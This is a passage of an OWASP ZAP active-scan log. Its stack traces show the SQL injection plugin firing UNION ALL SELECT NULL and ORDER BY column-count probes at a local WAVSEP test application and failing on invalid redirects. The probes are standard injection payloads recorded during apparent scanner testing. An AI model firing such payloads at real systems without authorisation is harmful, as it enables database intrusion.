org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679525 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679525 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679527 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679527 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679528 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679528 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679529 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679530 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679531 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679531 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679532 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679533 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 4666#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 4666# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679533 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at 